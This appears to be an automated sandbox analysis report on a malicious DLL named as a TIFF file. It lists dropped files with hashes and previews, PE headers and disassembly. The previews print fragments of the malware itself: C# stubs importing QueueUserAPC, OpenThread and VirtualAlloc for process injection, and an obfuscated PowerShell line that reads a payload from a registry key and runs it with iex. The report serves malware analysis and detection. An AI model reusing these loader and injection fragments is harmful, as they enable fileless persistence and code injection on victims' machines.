                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                            Category:dropped
                            Size (bytes):1328
                            Entropy (8bit):3.995664612989827
                            Encrypted:false
                            SSDEEP:24:HM2je9E2+fQIDfHlQhKdNWI+ycuZhNeqakSpbPNnq9qd:/QGFyKd41uleqa3pRq9K
                            MD5:6587DEF66392DAB6B08BF59A1C8F335D
                            SHA1:D3BDF1132EB91B84F76740631C5FB05E1EC06E00
                            SHA-256:1538AF45B6819C8771B587E453588ABFE4F027FE368051BEE4FE1757BF7D6007
                            SHA-512:E598F1A700D83B9E66F1993D69390C9D13A1F0FAB1847AA7B0F5C22C21C745A2453B9D8CB3CFA724F1D812F82CD8D0765940F50177FF923D27C53FE238EC7D5E
                            Malicious:false
                            Preview:L.....jb.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\o1ulwvct\CSC9597862635B74071BA42F3284427E86E.TMP...................3!A.1../c..#..........4.......C:\Users\user\AppData\Local\Temp\RES9868.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...o.1.u.l.w.v.c.t...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                            Category:dropped
                            Size (bytes):1328
                            Entropy (8bit):3.9710842422597117
                            Encrypted:false
                            SSDEEP:24:HMje9EuZfAt+ov4DfHnhKdNWI+ycuZhNYakS0PNnq9qd:fBALuBKd41ulYa3Uq9K
                            MD5:6A48F7D6DEFC4A58B553495102391375
                            SHA1:CE2F027ACDF13CD5A8A3831EC5C08A83E7005E97
                            SHA-256:46848DC2C4440B7CC5D30DF42845016CC7008B768ED61F96A89D551800EBFB57
                            SHA-512:C20E075B4C315F9F79620DE140CAA700BC47149D13348022D6A90492BCFC2B29A5DF135C2BBCAFB00D412D6CE12FD2A8E9FE29173EC5A571CA234A4AAB6851B2
                            Malicious:false
                            Preview:L...#.jb.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\tn4ral5l\CSC7E5DF85510FF49B49113DD9CBF81BD4.TMP................zu.Y..n9.%.m...{..........4.......C:\Users\user\AppData\Local\Temp\RESA96F.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.n.4.r.a.l.5.l...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview:1
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview:1
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            File Type:MSVC .res
                            Category:dropped
                            Size (bytes):652
                            Entropy (8bit):3.106144324425024
                            Encrypted:false
                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryqXqak7YnqqZXbPN5Dlq5J:+RI+ycuZhNeqakSpbPNnqX
                            MD5:0CA3AAF1332141EC31A3082F63FCC223
                            SHA1:275094865A6819117E9F912250B4678A7E47CBE1
                            SHA-256:CF1FEF2B2110B06F3E111F93F7C643785D63E3A26635FFA5A025860EC71C529D
                            SHA-512:7179731F0F2A12E574C9111AE7FC048DA21AE1310DC94D8820AAA8ED09D70858A07879F3635A04240B703D1D53DCBE00400EC55907C400B814F385E179116EFD
                            Malicious:false
                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...o.1.u.l.w.v.c.t...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...o.1.u.l.w.v.c.t...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text
                            Category:dropped
                            Size (bytes):403
                            Entropy (8bit):5.058106976759534
                            Encrypted:false
                            SSDEEP:6:V/DsYLDS81zuJiWmMRSR7a1nQTsyBSRa+rVSSRnA/fpM+y:V/DTLDfuQWMBDw9rV5nA/3y
                            MD5:99BD08BC1F0AEA085539BBC7D61FA79D
                            SHA1:F2CA39B111C367D147609FCD6C811837BE2CE9F3
                            SHA-256:8DFF0B4F90286A240BECA27EDFC97DCB785B73B8762D3EAE7C540838BC23A3E9
                            SHA-512:E27A0BF1E73207800F410BA9399F1807FBA940F82260831E43C8F0A8B8BFA668616D63B53755526236433396AF4EF21E1EB0DFA9E92A0F34DB8A14C292660396
                            Malicious:false
                            Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class bju. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr wqyemwbu,IntPtr vlbfvx,IntPtr hokikv);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint uqvnjbf,uint pmyb,IntPtr rheqdsvorya);.. }..}.
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                            Category:dropped
                            Size (bytes):369
                            Entropy (8bit):5.228628350308548
                            Encrypted:false
                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fDQiGdGqzxs7+AEszIwkn23fDQiGdGP:p37Lvkmb6KRfkNWZEifko
                            MD5:0D4B64639A192247DF402E019930BB67
                            SHA1:CA1AF61AC898895AC43D1A7CBE6B19EEB309F2D1
                            SHA-256:15A70E1E3F2D41533C027174C48ADE604221D1FF09076828E0E094A2B2AAB8ED
                            SHA-512:D4E6EF9C54DCD84BA4B58DD5C5B1E827421B1B572794290A2D96052574D4949761950CE3A8560715B8334A30C7FF36BE518A7FDA14610393007E1D6181C820CF
                            Malicious:false
                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\o1ulwvct\o1ulwvct.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\o1ulwvct\o1ulwvct.0.cs"
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):3584
                            Entropy (8bit):2.6167081012196842
                            Encrypted:false
                            SSDEEP:24:etGSG8OmU0t3lm85xWAseO4z8Q64pfUPtkZfPx0xSz3VUWI+ycuZhNeqakSpbPNq:6gXQ3r5xNOzQfUuJJ0xc31uleqa3pRq
                            MD5:A1D5C3054EA8FFA5550A29CE9E6F74F9
                            SHA1:733D9BE957632F61B0E6E16A7CBC56F4515DD03F
                            SHA-256:5609E8BDF9FEA420BD27DFC2199324182BF52C8E57B036B4C1744CE82DE9A87D
                            SHA-512:5642AED56E506AA6373CEFB8AC41C6A7D7E642E9011A547A54348445D5EEA69BED2EFC0B313F06362AC30794D93EC544AFECEFE3CB2E9BD3953930D0F8CCCEE9
                            Malicious:false
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....jb...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....*BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ C............ V.....P ......a.........g.....p.....w.....~...............a. ...a...!.a.%...a.......*.....3.0.....6.......C.......V...........
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                            Category:modified
                            Size (bytes):866
                            Entropy (8bit):5.318127705611573
                            Encrypted:false
                            SSDEEP:24:AId3ka6KRf7EifmKaM5DqBVKVrdFAMBJTH:Akka6C7EumKxDcVKdBJj
                            MD5:9220957F6304D18EBE11EEB2E498901F
                            SHA1:4AFE215A0ABFE86D27724AD19C757562E85BD206
                            SHA-256:7A8B3042CDBAAF872FAD5B137DBD4C29526E2B5D26EC23ADE382C5CBF0F2D9D0
                            SHA-512:C242A94B75DB54809816DDE407132F730CF5EC42D196C4DD5F882AE38FA3D1E63239C276094110AF5FA7F3F47BBBAA1D674115D36C298C88504CB56FA0D4F735
                            Malicious:false
                            Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\o1ulwvct\o1ulwvct.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\o1ulwvct\o1ulwvct.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            File Type:MSVC .res
                            Category:dropped
                            Size (bytes):652
                            Entropy (8bit):3.070250175986324
                            Encrypted:false
                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryWak7Ynqq0PN5Dlq5J:+RI+ycuZhNYakS0PNnqX
                            MD5:7A75DA598ED96E390E25DC6D02BDCD7B
                            SHA1:59A35E35426D7A769C59273042375DE1A3DB1CEA
                            SHA-256:B4C0AE1F1CA5E0AE438B82750A560A9B4B2B2A6629B91AFF268515EBB9D006AE
                            SHA-512:25C938C2B4458FEAEF3B915AF37A4003A3CA8B8CF1FF91B2B8650DB1AA2D99218C2AEF30B1BC6381DE4065390D60997C020F75BB838AA2EDD744B6FB748D3C5B
                            Malicious:false
                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.n.4.r.a.l.5.l...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...t.n.4.r.a.l.5.l...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text
                            Category:dropped
                            Size (bytes):392
                            Entropy (8bit):4.988829579018284
                            Encrypted:false
                            SSDEEP:6:V/DsYLDS81zuJ6VMRSRa+eNMjSSRr92B7SSRNAtwy:V/DTLDfuk9eg5r9yeqy
                            MD5:80545CB568082AB66554E902D9291782
                            SHA1:D013E59DC494D017F0E790D63CEB397583DCB36B
                            SHA-256:E15CA20CFE5DE71D6F625F76D311E84240665DD77175203A6E2D180B43926E6C
                            SHA-512:C5713126B0CB060EDF4501FE37A876DAFEDF064D9A9DCCD0BD435143DAB7D209EFBC112444334627FF5706386FB2149055030FCA01BA9785C33AC68E268B918D
                            Malicious:false
                            Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class buvbcy. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint jujqjjcr,uint fvu);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr fnpqam,uint ecktq,uint arixnpjcmw,uint mbhifa);.. }..}.
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                            Category:dropped
                            Size (bytes):369
                            Entropy (8bit):5.178508652415704
                            Encrypted:false
                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fMJT9zxs7+AEszIwkn23fMJTY:p37Lvkmb6KRfAT9WZEifATY
                            MD5:2AC07CA087D2B630DDE7F8CA8C735F5E
                            SHA1:73CAEF5C78A7EA6A779521DDB938AA4C7C67CFF8
                            SHA-256:AD71536ED4CC55973C9DE915BC6C784B036CD0BC31FDC72BC19891535A0CE208
                            SHA-512:9FFECE26A01583FA5922538757FB3EBCDCC277F41E275DBB0CB4E53A93C2F01CBFE966F397164A2B07C813A48C5E50B2016EC69E98F54A27E16ACA1DBDEF7D2C
                            Malicious:false
                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\tn4ral5l\tn4ral5l.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\tn4ral5l\tn4ral5l.0.cs"
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):3584
                            Entropy (8bit):2.592678879252231
                            Encrypted:false
                            SSDEEP:24:etGS3/u2Bg85z7xlfwZD6SgdWqtkZfSwzWI+ycuZhNYakS0PNnq:6GYb5hFCD6TWdJSZ1ulYa3Uq
                            MD5:56BB941B344F5E00BD719C3B50396B06
                            SHA1:BCEDEEBAC6120B395E3CF217828EE9DD8BA8E8CE
                            SHA-256:767A6177DB9E00E45FD811D64F595B0D8D816AD6EAC42B46A791E0CB0B17FA95
                            SHA-512:C8ED28D50EFED53C2B04BFD3DFDFFB77CBE86005728C9E5575A5912CBA4A041C64EBB3410B227F4982C4820328242A54B7382FF73627D21F01C6B460F4980690
                            Malicious:false
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...".jb...........!.................#... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..T.............................................................(....*BSJB............v4.0.30319......l...H...#~......4...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...................................................... 9............ K............ S.....P ......`.........f.....o.....s.....z...............`. ...`...!.`.%...`.......*.....3.+.....9.......K.......S...........
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                            Category:modified
                            Size (bytes):866
                            Entropy (8bit):5.301947942506882
                            Encrypted:false
                            SSDEEP:24:AId3ka6KRfATSEifATNKaM5DqBVKVrdFAMBJTH:Akka6CATSEuATNKxDcVKdBJj
                            MD5:DDC54E3FAE36E0AA75B36EA5C85F4098
                            SHA1:A1F1DFF87060524E1C350141B9DE22F2D3067AB5
                            SHA-256:EBD48312C734BDFAA4F92726959CF518F1A7D12D31041693AD66109C99BAB7ED
                            SHA-512:E0B337A41A8FC17C9458BCBF0860CE75D189025DDBF16952180A82D0868148B61A016CF149D4F3F44D8F763156F627459787461C8CDB3A577274FBF66575782F
                            Malicious:false
                            Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\tn4ral5l\tn4ral5l.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\tn4ral5l\tn4ral5l.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                            Process:C:\Windows\explorer.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):218
                            Entropy (8bit):5.411852919034256
                            Encrypted:false
                            SSDEEP:6:QHXv1sr3gK1C+LgyKBM34H6dNH83F1tu4r9iyeqmM:Q39sTN13LgyaI4HscA4cyeHM
                            MD5:965E42B72C6150D487D2F6487DF81B2D
                            SHA1:A0C711D3725E07226527E96B9B939FAD97C9A20D
                            SHA-256:625461A15B47DFC81DBD5EDD7004771F0F23069047F866189D817EFC7DB8BAA0
                            SHA-512:19CBF9CBA5F1888510D5C9A24A3C75FF2B5B2323E94CD034D57399D8C676CE2957E56914862BAA79AD0E6B4EA4BE8E0206048A02C4BB64F5F987C32ACDA62AE6
                            Malicious:false
                            Preview:new-alias -name dvjac -value gp;new-alias -name wsnvbi -value iex;wsnvbi ([System.Text.Encoding]::ASCII.GetString((dvjac "HKCU:\Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                            Process:C:\Windows\explorer.exe
                            File Type:MS Windows shortcut, Item id list present, Has Relative path, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
                            Category:dropped
                            Size (bytes):838
                            Entropy (8bit):3.073236880282747
                            Encrypted:false
                            SSDEEP:12:8glVm/3BVSXvk44X3ojsqzKtnWNaVgiNL4t2Y+xIBjK:8p/BHYVKVWiV57aB
                            MD5:CA1C201059C5BFD5900F5EB2466883CC
                            SHA1:BF3670A8C06A4FABC5C410F368E178B353F9166C
                            SHA-256:E5717E89B0D46C5E89F39410FA7A9DE94AA6A3301F8AC920F84F1A7179554085
                            SHA-512:2273AF46D41B9698B23AEADD8EFBEF80017CFD465B4347CFB99C2FEAE371F39A511288AA64AAFA2E35DD2AD883D8E43D70A65E62C18977C6C6D85E3153041D4C
                            Malicious:false
                            Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@............................................W.i.n.d.o.w.s.....Z.1...........System32..B............................................S.y.s.t.e.m.3.2.....t.1...........WindowsPowerShell.T............................................W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l.l... .N.1...........v1.0..:............................................v.1...0.....l.2...........powershell.exe..N............................................p.o.w.e.r.s.h.e.l.l...e.x.e...........\.p.o.w.e.r.s.h.e.l.l...e.x.e.........%...............wN....]N.D...Q..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.................
                            File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):6.102098470589205
                            TrID:
                            • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                            • Generic Win/DOS Executable (2004/3) 0.20%
                            • DOS Executable Generic (2002/1) 0.20%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:626a983c091a8.tiff.dll
                            File size:618496
                            MD5:388aa15c4d1a96534e7ca5587942fa0a
                            SHA1:a88e07643c07c8f75845c82c19cd928355d441b2
                            SHA256:abc6dfca9ad106cf41da3b6309a15e2a761991d2fad41662211b1afb1c2b0973
                            SHA512:c21861d1e8a81159e615431afa9c6da74d92aeb13f9471e3d8af2bdc979f8be85ed2eb7ef3835fe86812fdb5955d6351ca8dbd7d6c164007bc9c41fb09266f56
                            SSDEEP:6144:eBbkmU1vOuplJ9dX8vxxaYuQ1n79lmdrjhXccbwD1Yl/R0odd6MbBCKaD3abuFGs:iUJVpX9cgQ1n7DQjbES/OodJ+sS
                            TLSH:7FD4E029C7601A6AD81537791899803F0A39F578E32F70EF26847D6FB50A6F05A34F39
                            File Content Preview:MZ......................@...................................,...........!..L.!This program cannot be run in DOS mode....$........I.R.(n..(n..(n......(n..z...(n..P...(n.fLj..(n..vl..(n..z...(n..P...(n.._...(n..z...(n..z...(n......(n.fLk..(n..z...(n..z...(n
                            Icon Hash:9068eccc64f6e2ad
                            Entrypoint:0x401023
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                            DLL Characteristics:TERMINAL_SERVER_AWARE
                            Time Stamp:0x411096D1 [Wed Aug 4 07:57:05 2004 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:0
                            File Version Major:5
                            File Version Minor:0
                            Subsystem Version Major:5
                            Subsystem Version Minor:0
                            Import Hash:de44747c447d17324a209c20a63c5698
                            Instruction
                            jmp 00007F848CE02CCDh
                            jmp 00007F848CE33348h
                            jmp 00007F848CE02A43h
                            jmp 00007F848CE0281Eh
                            jmp 00007F848CE02AC9h
                            jmp 00007F848CE026A4h
                            jmp 00007F848CE3888Fh
                            jmp 00007F848CE027CAh
                            jmp 00007F848CE2BCF5h
                            jmp 00007F848CE3BB30h
                            jmp 00007F848CE3774Bh
                            jmp 00007F848CE3CC36h
                            jmp 00007F848CE02751h
                            jmp 00007F848CE2CE8Ch
                            jmp 00007F848CE3F3B7h
                            jmp 00007F848CE366A2h
                            jmp 00007F848CE2DEDDh
                            jmp 00007F848CE414F8h
                            jmp 00007F848CE028D3h
                            jmp 00007F848CE3E05Eh
                            jmp 00007F848CE34529h
                            jmp 00007F848CE2EEF4h
                            jmp 00007F848CE3DC8Fh
                            jmp 00007F848CE02A2Ah
                            jmp 00007F848CE39935h
                            jmp 00007F848CE31240h
                            jmp 00007F848CE4148Bh
                            jmp 00007F848CE30106h
                            jmp 00007F848CE02A21h
                            jmp 00007F848CE0272Ch
                            jmp 00007F848CE3AA67h
                            jmp 00007F848CE403D2h
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            Programming Language:
                            • [IMP] VS2012 UPD4 build 61030
                            • [ C ] VS2013 UPD2 build 30501
                            • [IMP] VS2013 UPD3 build 30723
                            • [IMP] VS2010 SP1 build 40219
                            • [C++] VS2013 build 21005
                            • [RES] VS2008 build 21022
                            • [IMP] VS2013 build 21005
                            • [LNK] VS2015 UPD3.1 build 24215
                            • [EXP] VS2008 build 21022
                            • [ C ] VS2013 UPD3 build 30723
                            • [C++] VS2017 v15.5.4 build 25834
                            • [RES] VS2013 build 21005
                            • [ C ] VS2017 v15.5.4 build 25834
                            Name                                  Virtual Address  Virtual Size  Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT          0x8a000          0xa0          .idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE        0x8b000          0xc100        .rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC       0x98000          0x1010        .reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG           0x40000          0x38          .rdata
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_IAT             0x8a2ac          0x20c         .idata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x1000           0x1           .text
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                            Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
                            .text   0x1000           0x3efe0       0x3f000   False     0.375895182292   data       4.45975589538  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                            .rdata  0x40000          0x3fb5f       0x40000   False     0.815296173096   data       7.22910177016  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data   0x80000          0x9537        0x7000    False     0.3271484375     data       5.47009773382  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                            .idata  0x8a000          0x98d         0x1000    False     0.2060546875     data       2.48883672307  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                            .rsrc   0x8b000          0xc100        0xd000    False     0.465106670673   data       5.38059585556  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc  0x98000          0x17d7        0x2000    False     0.237915039062   data       3.90488138375  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            Name           RVA      Size    Type                                                                                                                            Language  Country
                            RT_BITMAP      0x8b510  0x666   data                                                                                                                            English   United States
                            RT_ICON        0x8bb78  0x485d  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced                                                                     English   United States
                            RT_ICON        0x903d8  0x25a8  dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 331218944, next used block 4106092544        English   United States
                            RT_ICON        0x92980  0xea8   data                                                                                                                            English   United States
